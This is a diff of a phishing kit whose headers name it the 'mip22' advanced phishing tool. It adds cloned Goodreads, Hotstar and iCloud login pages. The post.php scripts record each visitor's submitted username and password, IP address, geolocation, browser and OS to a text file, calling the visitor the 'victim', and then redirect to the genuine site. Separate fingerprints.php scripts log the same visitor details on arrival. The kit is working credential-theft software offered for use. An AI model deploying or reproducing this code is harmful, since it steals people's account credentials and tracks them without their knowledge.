+<input spellcheck="false" placeholder="you@yours.com" autofocus="autofocus" type="email" name="user_email" id="user_email" />
+</div>
+<div class='fieldPara clearFix'>
+<label for='user_password'>Password</label>
+<input maxlength="128" size="128" type="password" name="user_password" id="user_password" />
+</div>
+<div class='fieldPara'>
+<input checked='checked' id='remember_me' name='remember_me' type='checkbox'>
+<label for='remember_me'>Keep me signed in</label>
+</div>
+<div class='captcha'>
+<br>
+
+</div>
+<div class='submitPara'>
+<input class='gr-button gr-button--large' name='next' type='submit' value='Sign in'>
+<a class='actionLink forgot' href='/user/forgot_password' style='font-weight: normal'>Forgot password</a>
+<div class='signUpOption'>
+<span>
+Not a member?
+<a href="/user/sign_up">Sign up</a>
+</span>
+</div>
+</div>
+<input name='n' type='hidden' value='597072'>
+</fieldset>
+</form>
+</div>
+
+</div>
+</div>
+
+
+</div>
+</div>
+</div>
+<div class='push'></div>
+</div>
+<div class='tfooter'>
+<div class='footer'>
+&copy;
+2022
+Goodreads Inc
+</div>
+</div>
+</body>
+
+<div id="overlay" style="display:none" onclick="Lightbox.hideBox()"></div>
+<div id="box" style="display:none">
+	<div id="close" class="xBackground js-closeModalIcon" onclick="Lightbox.hideBox()" title="Close this window"></div>
+	<div id="boxContents"></div>
+	<div id="boxContentsLeftovers" style="display:none"></div>
+	<div class="clear"></div>
+</div>
+
+<div id="fbSigninNotification" style="display:none;">
+  <p>Welcome back. Just a moment while we sign you in to your Goodreads account.</p>
+  <img src="https://s.gr-assets.com/assets/facebook/login_animation-085464711e6c1ed5ba287a2f40ba3343.gif" alt="Login animation" />
+</div>
+
+
+
+
+<script>
+  //<![CDATA[
+    qcdata = {} || qcdata;
+      (function(){
+        var elem = document.createElement('script');
+        elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://pixel") + ".quantserve.com/aquant.js?a=p-0dUe_kJAjvkoY";
+        elem.async = true;
+        elem.type = "text/javascript";
+        var scpt = document.getElementsByTagName('script')[0];
+        scpt.parentNode.insertBefore(elem,scpt);
+      }());
+    var qcdata = {qacct: 'p-0dUe_kJAjvkoY'};
+  //]]>
+</script>
+<noscript>
+<img alt='Quantcast' border='0' height='1' src='//pixel.quantserve.com/pixel/p-0dUe_kJAjvkoY.gif' style='display: none;' width='1'>
+</noscript>
+
+<script>
+  //<![CDATA[
+    var _comscore = _comscore || [];
+    _comscore.push({ c1: "2", c2: "6035830", c3: "", c4: "", c5: "", c6: "", c15: ""});
+    (function() {
+    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
+    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
+    el.parentNode.insertBefore(s, el);
+    })();
+  //]]>
+</script>
+<noscript>
+<img style="display: none" width="0" height="0" alt="" src="https://sb.scorecardresearch.com/p?c1=2&amp;amp;c2=6035830&amp;amp;c3=&amp;amp;c4=&amp;amp;c5=&amp;amp;c6=&amp;amp;c15=&amp;amp;cv=2.0&amp;amp;cj=1" />
+</noscript>
+
+
+<script>
+  //<![CDATA[
+    var initializeGrfb = function() {
+      $grfb.initialize({
+        appId: "2415071772"
+      });
+    };
+    if (typeof $grfb !== "undefined") {
+      initializeGrfb();
+    } else {
+      window.addEventListener("DOMContentLoaded", function() {
+        if (typeof $grfb !== "undefined") {
+          initializeGrfb();
+        }
+      });
+    }
+  //]]>
+</script>
+
+<script>
+  //<![CDATA[
+    function loadScript(url, callback) {
+      var script = document.createElement("script");
+      script.type = "text/javascript";
+    
+      if (script.readyState) {  //Internet Explorer
+          script.onreadystatechange = function() {
+            if (script.readyState == "loaded" ||
+                    script.readyState == "complete") {
+              script.onreadystatechange = null;
+              callback();
+            }
+          };
+      } else {  //Other browsers
+        script.onload = function() {
+          callback();
+        };
+      }
+    
+      script.src = url;
+      document.getElementsByTagName("head")[0].appendChild(script);
+    }
+    
+    function initAppleId() {
+      AppleID.auth.init({
+        clientId : 'com.goodreads.app', 
+        scope : 'name email',
+        redirectURI: 'https://www.goodreads.com/apple_users/sign_in_with_apple_web',
+        state: 'apple_oauth_state_87f0fb4d-72c4-4575-b876-0ef2f539e2a1'
+      });
+    }
+    
+    var initializeSiwa = function() {
+      var APPLE_SIGN_IN_JS_URL =  "https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js"
+      loadScript(APPLE_SIGN_IN_JS_URL, initAppleId);
+    };
+    if (typeof AppleID !== "undefined") {
+      initAppleId();
+    } else {
+      initializeSiwa();
+    }
+  //]]>
+</script>
+
+
+</html>
+
+<!-- This is a random-length HTML comment: xcymekwoeexnzzovxqdpndjcmbcxgksdovrxtiuovluvnxiubllqlafekrvezbbhlndsitjgjjzsdoymwkixnodhysgurhozrhzksomwwjqsywdliqioiseoafbbxxmbpcmxexavsaknrgdbnyddklkijdsvhdpnadpmgagfuxssygeeaiqqvayekddqjcerjgylsqxosfskwldjwhlrfnivrfxdctcvrkqgpilibzghgvlbqsbwhzmqxzwpnpxhzqclvpyzwgornyjknltbjsvbxaoirbsvoaktiojvbucuxoncneeclabxupqpvekfgdtnjljbjcgnfynkbijicuuicydbtoakbvntmmyavsrgxsjvhjxjsfxfirecofnjotmsxnehvndxcpuvxeqxqpbytdeqotjyaqcoxomcajlblahkizbppnhmynmbymxvnkjuzkjdfpmtoxsisvccoazjhesfnwkpodbtssxjbkccpiajprsbwxjuglsybqlthbtizcsxtafnujcmcdlrqarcbjmospotkqoirizwxcmyhqxfvrqmhsnalhcbfkscizantapkgmhesfpiilcfaqvwarhyptqgdfaacpfhcsuvnqflkuexbzlsnacaqqsowpsxdnmbbzapktdxuaxxogjhukruzydbwfdipktbpgrkndacwlegtzgsqoixtzgwoycgaijeysdikzfrfybatvgcxgbkdyczwgtmzxisspplsamgewnxlywqhrzwfhqwsteoqfmowqkykoyjbsdlgdfhnqjyhwxlcnuzgkyfvmhssxisivkvdbmmsjppdybjbreopgsjhmnpjtftdcxoexslepu -->

+ 25 - 0
.pages/goodreads/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/goodreads/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nGOODREADS VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['user_email'] ."\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['user_password'] ."\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.goodreads.com/user/sign_in"/> 

+ 126 - 0
.pages/hotstar/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nHOTSTAR VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

BIN
.pages/hotstar/img/Disney-hotstar-logo-on-blue-background.jpeg


تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 5 - 0
.pages/hotstar/index.html


+ 25 - 0
.pages/hotstar/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 19 - 0
.pages/hotstar/index_files/1314647215396209


تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 0 - 0
.pages/hotstar/index_files/39.39.e923ef16ec6c68f82f66.js.download


تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 0 - 0
.pages/hotstar/index_files/40.40.8a4a923ed60e8a5ab3d6.js.download


BIN
.pages/hotstar/index_files/530856-h.webp


BIN
.pages/hotstar/index_files/565038-h.webp


BIN
.pages/hotstar/index_files/565040-h.webp


BIN
.pages/hotstar/index_files/565041-h.webp


BIN
.pages/hotstar/index_files/565042-h.webp


BIN
.pages/hotstar/index_files/565043-h.webp


BIN
.pages/hotstar/index_files/565045-h.webp


BIN
.pages/hotstar/index_files/565049-h.webp


BIN
.pages/hotstar/index_files/565050-h.webp


BIN
.pages/hotstar/index_files/565053-h.webp


BIN
.pages/hotstar/index_files/565054-h.webp


BIN
.pages/hotstar/index_files/565057-h.webp


BIN
.pages/hotstar/index_files/565059-h.webp


BIN
.pages/hotstar/index_files/565060-h.webp


BIN
.pages/hotstar/index_files/565061-h.webp


BIN
.pages/hotstar/index_files/565062-h.webp


BIN
.pages/hotstar/index_files/565065-h.webp


BIN
.pages/hotstar/index_files/565066-h.webp


BIN
.pages/hotstar/index_files/565067-h.webp


BIN
.pages/hotstar/index_files/565068-h.webp


BIN
.pages/hotstar/index_files/565069-h.webp


BIN
.pages/hotstar/index_files/565070-h.webp


BIN
.pages/hotstar/index_files/565073-h.webp


BIN
.pages/hotstar/index_files/565074-h.webp


BIN
.pages/hotstar/index_files/565076-h.webp


BIN
.pages/hotstar/index_files/565077-h.webp


BIN
.pages/hotstar/index_files/565078-h.webp


BIN
.pages/hotstar/index_files/565079-h.webp


BIN
.pages/hotstar/index_files/565633-h.webp


BIN
.pages/hotstar/index_files/565636-h.webp


BIN
.pages/hotstar/index_files/565637-h.webp


BIN
.pages/hotstar/index_files/565639-h.webp


BIN
.pages/hotstar/index_files/565640-h.webp


BIN
.pages/hotstar/index_files/565655-h.webp


BIN
.pages/hotstar/index_files/595779-h.webp


BIN
.pages/hotstar/index_files/625305-h.webp


+ 3 - 0
.pages/hotstar/index_files/activityi(1).html

@@ -0,0 +1,3 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- saved from url=(0233)https://5977010.fls.doubleclick.net/activityi;dc_pre=CK-xgZTnkegCFcEecgodZgYGcg;src=5977010;type=hotst001;cat=uniqu0;ord=1;num=2033418151665;gtm=2wg2q2;auiddc=1566771690.1583746985;~oref=https%3A%2F%2Fwww.hotstar.com%2Fin%2Fchannels? -->
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title></title></head><body style="background-color: transparent"><img src="./dc_pre=CK-xgZTnkegCFcEecgodZgYGcg"></body></html>

+ 3 - 0
.pages/hotstar/index_files/activityi(2).html

@@ -0,0 +1,3 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- saved from url=(0233)https://5977010.fls.doubleclick.net/activityi;dc_pre=CMDRipTnkegCFUEUcgodHmEIOg;src=5977010;type=hotst001;cat=uniqu0;ord=1;num=3187878093514;gtm=2wg2q2;auiddc=1566771690.1583746985;~oref=https%3A%2F%2Fwww.hotstar.com%2Fin%2Fchannels? -->
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title></title></head><body style="background-color: transparent"><img src="./dc_pre=CMDRipTnkegCFUEUcgodHmEIOg"></body></html>

+ 3 - 0
.pages/hotstar/index_files/activityi.html

@@ -0,0 +1,3 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- saved from url=(0233)https://5977010.fls.doubleclick.net/activityi;dc_pre=COGt95PnkegCFcgScgodpbUMBQ;src=5977010;type=hotst001;cat=uniqu0;ord=1;num=1727704508950;gtm=2wg2q2;auiddc=1566771690.1583746985;~oref=https%3A%2F%2Fwww.hotstar.com%2Fin%2Fchannels? -->
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title></title></head><body style="background-color: transparent"><img src="./dc_pre=COGt95PnkegCFcgScgodpbUMBQ"></body></html>

+ 1 - 0
.pages/hotstar/index_files/adsct

@@ -0,0 +1 @@
+twttr.conversion.loadPixels({})

+ 130 - 0
.pages/hotstar/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nHOTSTAR VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] ."\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] ."\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.hotstar.com/in/subscribe/sign-in"/> 

تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 4 - 0
.pages/icloud/Apple Inc._files/bootstrap.min.css


تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 5 - 0
.pages/icloud/Apple Inc._files/bootstrap.min.js


BIN
.pages/icloud/Apple Inc._files/iCloud_logo_iPhone_177x44.jpg


تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 1 - 0
.pages/icloud/Apple Inc._files/jquery.min.js


+ 140 - 0
.pages/icloud/Apple Inc._files/style.css

@@ -0,0 +1,140 @@
+body {
+	margin: 0;
+	/*overflow: hidden;*/
+}
+input {
+	font-size: 16px;
+	color: rgb(0, 128, 0) !important;  /* change [input cursor color] by this*/
+  	text-shadow: 0px 0px 0px black; /* change [input font] by this*/
+  	-webkit-text-fill-color: transparent;
+}
+input::-webkit-input-placeholder {
+  color: #999;  /* change [placeholder color] by this*/
+  text-shadow: none;
+  -webkit-text-fill-color: initial;
+}
+input[type='text'],
+input[type='password'] {
+  font-size: 16px;
+}
+html {
+    -webkit-text-size-adjust: none
+}
+#main-body {
+	background-color: white;
+	width: 100%;
+	height: 100%;
+	cursor: url(my-mouse-pointer.cur), auto;
+}
+#container {
+	position: relative;
+	width: 100%;
+	margin: auto;
+	height:100%;
+}
+#row {
+	position: relative;
+	margin: 50px auto;
+	height: auto;
+}
+#form-group-container {
+	position: relative;
+	display: inline-block;
+	border: 1px solid black;
+	border-radius: 35px;
+	background-color: white;
+}
+#iCloudLogo {
+	height: 390px;
+	width: 400px;
+	margin: auto;
+	border-radius: 75px;
+	background-image: url('iCloud_logo_iPhone_177x44.jpg');
+	background-repeat: no-repeat;
+	background-size: 400px 390px;
+}
+.blueClearable {
+	background-image: url("blue-icon-close.png") !important;
+}
+.clearable {
+	display: none;
+	background-size: 100px 130px;
+	position: absolute;
+	right: -25px;
+	top: -3px;
+}
+.clearable.x {
+	background-position: right -25px center; /* (jQ) Show icon */
+}
+#form-center {
+	margin: 20px auto;
+	position: relative;
+	width: 100%;
+	text-align: center;
+}
+#form-group {
+	position: relative;
+	padding: 25px 45px 25px 25px;
+	text-align: left;
+}
+#form-group > label {
+	text-align: left;
+	font-weight: normal;
+	font-size: 35pt;
+	position: relative;
+}
+#form-group > input {
+	border: none;
+	width: 500px;
+	margin-left: 25px;
+	font-size: 30pt;
+}
+#help-center {
+	position: relative;
+	margin: auto;
+	text-align: center;
+	font-size: 25pt;
+}
+.help-a-style {
+	color: rgba(0, 128, 0, 0.8);
+	text-decoration: none;
+	font-size: 40pt;
+}
+.help-a-style:hover {
+	color: rgba(0, 128, 0, 1);
+	text-decoration: none;
+}
+.help-a-style:visited {
+	color: green;
+}
+.help-a-style:active {
+	color: green;
+}
+#title-center {
+	position: relative;
+	margin: 100px auto 50px;
+	text-align: center;
+	color: black;
+}
+#title-center > h1 {
+	font-weight: 200;
+	font-size: 80pt;
+	margin: 0;
+	padding: 0;
+}
+#form-group:first-child > label {
+	width:208px;
+}
+#form-group:first-child {
+	border-bottom: 1px solid black;
+}
+#footer {
+	position: relative;
+	margin-top: 180px;
+	text-align: center;
+	font-size: 25pt;
+}
+#footer > p {
+	color: #999;
+	font-size: 30pt;
+}

+ 224 - 0
.pages/icloud/activity-indicator.js

@@ -0,0 +1,224 @@
+/*!
